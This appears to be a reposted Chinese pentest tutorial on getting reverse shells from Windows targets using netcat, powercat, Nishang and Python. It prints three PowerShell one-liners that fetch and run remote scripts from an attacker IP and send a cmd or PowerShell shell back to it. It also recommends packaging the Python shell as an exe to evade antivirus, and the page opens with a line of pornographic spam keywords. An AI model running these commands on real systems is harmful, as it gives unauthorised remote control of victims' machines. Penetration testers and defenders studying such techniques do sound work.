国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Windows的幾種常用反彈shell方法

這篇具有很好參考價(jià)值的文章主要介紹了Windows的幾種常用反彈shell方法。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

零基礎(chǔ)學(xué)黑客,搜索公眾號(hào):白帽子左一

簡(jiǎn)介:shell類似于DOS下的COMMAND.COM和后來(lái)的cmd.exe,它接收用戶命令,然后調(diào)用相應(yīng)的應(yīng)用程序,也可以通俗的說(shuō)是命令執(zhí)行環(huán)境。分為交互式shell,與非交互式shell。

交互shell就是shell等待你的輸入,并且立即執(zhí)行你提交的命令,這種模式被稱作交互式是因?yàn)閟hell與用戶進(jìn)行交互。

非交互shell不會(huì)與用戶進(jìn)行交互,而是用戶讀取存放在文件中的命令或者輸入的命令,并且執(zhí)行它們。當(dāng)它讀到文件的結(jié)尾,shell也就終止了。

1.nc反彈shell

簡(jiǎn)介:nc是netcat的簡(jiǎn)寫,有著網(wǎng)絡(luò)界的瑞士軍刀美譽(yù)。因?yàn)樗绦【贰⒐δ軐?shí)用,被設(shè)計(jì)為一個(gè)簡(jiǎn)單、可靠的網(wǎng)絡(luò)工具

第一步:開(kāi)啟nc監(jiān)聽(tīng),這里我直接使用了Kali自帶的nc

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

第二步:在目標(biāo)服務(wù)器上使用nc工具,這個(gè)nc可以自己上傳

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

第三步:查看監(jiān)聽(tīng)端的nc,是否有shell反彈過(guò)來(lái)。

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

2.powershell反彈cmd

簡(jiǎn)介:powercat是netcat的powershell版本,下載地址:https://github.com/besimorhino/powercat ,由于這個(gè)地址默認(rèn)是被墻的,所以可以放在可被訪問(wèn)的遠(yuǎn)程服務(wù)器上。執(zhí)行命令的時(shí)候,自動(dòng)下載執(zhí)行。

第一步:攻擊者監(jiān)聽(tīng)

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

第二步:在webshell上執(zhí)行命令

powershell IEX (New-Object System.Net.Webclient).DownloadString(‘http://192.168.201.129/powercat.ps1‘); powercat -c 192.168.201.129 -p 9999 -e cmd

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

第三步:查看監(jiān)聽(tīng)端的nc,是否有shell反彈過(guò)來(lái)。

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

3.nishang反彈shell

簡(jiǎn)介:Nishang(https://github.com/samratashok/nishang )是一個(gè)基于PowerShell的攻擊框架,集合了一些 PowerShell攻擊腳本和有效載荷,可反彈TCP/ UDP/ HTTP/HTTPS/ ICMP等類型shell。

3.1)TCP反彈shell
第一步:攻擊者監(jiān)聽(tīng)

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

第二步:在目標(biāo)機(jī)器上執(zhí)行命令

powershell IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.201.129/Shells/Invoke-PowerShellTcp.ps1’);Invoke-PowerShellTcp -Reverse -IPAddress 192.168.201.129 -port 9999

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

第三步:查看監(jiān)聽(tīng)端的nc,是否有shell反彈過(guò)來(lái)。

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

3.2)UDP反彈shell

第一步:攻擊者監(jiān)聽(tīng)

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

第二步:在shell端執(zhí)行命令

powershell IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.201.129/Shells/Invoke-PowerShellUdp.ps1’);Invoke-PowerShellUdp -Reverse -IPAddress 192.168.201.129 -port 53

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

第三步:查看監(jiān)聽(tīng)端的nc,是否有shell反彈過(guò)來(lái)。

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

4.python反彈shell

簡(jiǎn)介:使用python編寫反彈shell,如果目標(biāo)支持python3可以腳本直接執(zhí)行即可,如果遇到殺軟可以使用生成exe的版本可以很好的逃逸殺軟。

第一步:攻擊者監(jiān)聽(tīng)

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

第二步:在shell端執(zhí)行命令

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

第三步:查看監(jiān)聽(tīng)端的nc,是否有shell反彈過(guò)來(lái)。

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全

windows反彈shell,windows,web安全,滲透測(cè)試,網(wǎng)絡(luò)安全文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-661257.html

到了這里,關(guān)于Windows的幾種常用反彈shell方法的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Web:前端常用的幾種Http請(qǐng)求GET和POST樣例

    Web:前端常用的幾種Http請(qǐng)求GET和POST樣例

    1、簡(jiǎn)述 在Web開(kāi)發(fā)過(guò)程中,少不了發(fā)起Http請(qǐng)求服務(wù)端的接口數(shù)據(jù),在不同的框架中使用了不同的Http請(qǐng)求方式,常用的請(qǐng)求有fetch、 ajax、 axios、XMLHttpRequest、request,以下樣例僅供參考。 2、Fetch Fetch API 是一種 JavaScript API,是一種基于 Promise 的現(xiàn)代API,用于在網(wǎng)絡(luò)中發(fā)送和接收

    2024年02月07日
    瀏覽(15)
  • Windows Bat實(shí)現(xiàn)延時(shí)功能的幾種常見(jiàn)方式

    Windows Bat實(shí)現(xiàn)延時(shí)功能的幾種常見(jiàn)方式

    在 bat 批處理中實(shí)現(xiàn)延時(shí)功能的幾種常用方式 使用ping命令可以實(shí)現(xiàn)延時(shí)的效果,命令如下: -n 指定 ping 的次數(shù),每次大概間隔1s, nul 將 ping 過(guò)程回顯信息給屏蔽 ping 命令實(shí)現(xiàn)的延時(shí),時(shí)間精度:大約1s,內(nèi)存占用: ping 命令所占用空間 注意閉坑:ping 從第1次發(fā)出請(qǐng)求到接收

    2024年02月11日
    瀏覽(16)
  • mysql復(fù)制表的幾種常用方法

    mysql復(fù)制表的幾種常用方法

    遇到需要拷貝一個(gè)表及其數(shù)據(jù)的情況,總結(jié)了一下幾種方法 1.使用 show create table 舊表 將結(jié)果拷貝出來(lái),將舊表名換成新表名即可. 注意:該方法僅適用于拷貝表結(jié)構(gòu),不需要同步數(shù)據(jù)的情況 2.create table 新表 like 舊表 該語(yǔ)句將完全拷貝舊表結(jié)構(gòu), 如果需要同步數(shù)據(jù),只需執(zhí)行 insert…

    2024年01月16日
    瀏覽(23)
  • python發(fā)送郵件的幾種常用方法

    第一種是最常見(jiàn)的,smtp發(fā)送 第二種是用outlook發(fā)送的,這個(gè)大家借鑒使用 第三種是正文需要用到表格的,我在這里給大家一個(gè)示例,具體表格怎么改自行發(fā)揮

    2024年02月16日
    瀏覽(20)
  • vue跳轉(zhuǎn)頁(yè)面的幾種常用方法

    目錄 vue跳轉(zhuǎn)不同頁(yè)面的方法 1.router-link跳轉(zhuǎn) 2.this.$router.push() 3.a標(biāo)簽可以跳轉(zhuǎn)外部鏈接,不能路由跳轉(zhuǎn) vue三種不同方式實(shí)現(xiàn)跳轉(zhuǎn)頁(yè)面 Vue:router-link this.$router.push(\\\"/\\\") this.$router.go(1) 代碼示例: !-- 直接跳轉(zhuǎn) -- router-link to=\\\'/testC\\\' ?button點(diǎn)擊跳轉(zhuǎn)2/button /router-link ? !-- 帶參數(shù)跳轉(zhuǎn)

    2024年02月11日
    瀏覽(22)
  • Jmeter —— 常用的幾種斷言方法(基本用法)

    Jmeter —— 常用的幾種斷言方法(基本用法)

    在使用JMeter進(jìn)行性能測(cè)試或者接口自動(dòng)化測(cè)試工作中,經(jīng)常會(huì)用到的一個(gè)功能,就是斷言,斷言相當(dāng)于檢查點(diǎn),它是用來(lái)判斷系統(tǒng)返回的響應(yīng)結(jié)果是否正確,以此幫我們判斷測(cè)試是否通過(guò),本文 主要介紹幾種常用的斷言:響應(yīng)斷言、JSON斷言、BeanShell 斷言 1. 響應(yīng)斷言是最常用

    2024年02月08日
    瀏覽(18)
  • 前端開(kāi)發(fā)中,定位bug的幾種常用方法

    前端開(kāi)發(fā)中,定位bug的幾種常用方法

    目錄 第一章 前言 第二章 解決bug的方法 2.1 百度 2.2 有道翻譯 2.3?debugger 2.4 console.log 日志打印 2.5 請(qǐng)求體是否攜帶參數(shù) 2.6 注釋頁(yè)面渲染代碼 2.7 其他 第三章 尾聲 備注:該文章只是本人在工作/學(xué)習(xí)中常用的幾種方法,如果有不對(duì)大家“胃口”的地方,勿噴,可以在評(píng)論區(qū)提供

    2024年02月04日
    瀏覽(19)
  • Web 頁(yè)面之間傳遞參數(shù)的幾種方法

    Web 頁(yè)面之間傳遞參數(shù)的方法有很多種,下面列出一些常見(jiàn)的方法以及它們的代碼示例。 一、前端直接傳遞參數(shù) 1、URL 參數(shù)傳遞(query string):通過(guò) URL 的查詢字符串(即問(wèn)號(hào)后面的參數(shù))將參數(shù)傳遞給頁(yè)面??梢酝ㄟ^(guò) location.search 或 URLSearchParams 對(duì)象來(lái)獲取和解析參數(shù)。 ?2、

    2024年02月01日
    瀏覽(32)
  • web安全學(xué)習(xí)筆記【05】——反彈Shell、正反向連接

    web安全學(xué)習(xí)筆記【05】——反彈Shell、正反向連接

    思維導(dǎo)圖 #知識(shí)點(diǎn): 1、Web常規(guī)-系統(tǒng)中間件數(shù)據(jù)庫(kù)源碼等 2、Web其他-前后端軟件Docker分配站等 3、Web拓展-CDNWAFOSS反向負(fù)載均衡等 ----------------------------------- 1、APP架構(gòu)-封裝原生態(tài)H5flutter等 2、小程序架構(gòu)-WebH5JSVUE框架等 ----------------------------------- 1、滲透命令-常規(guī)命令文件上傳

    2024年01月25日
    瀏覽(23)
  • ?Windows常用shell命令大全?

    ? Windows常用shell命令大全 基于鼠標(biāo)操作的后果就是OS界面外觀發(fā)生改變, ?就得多花學(xué)習(xí)成本。更主要的是基于界面引導(dǎo)Path與命令行直達(dá)速度是難以比擬的。另外Geek很大一部分是鍵盤控,而非鼠標(biāo)流的。 整理Windows的常用Shell命令,一方面幫助深入學(xué)習(xí)Mysql,另一方面準(zhǔn)備嘗

    2024年02月04日
    瀏覽(16)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包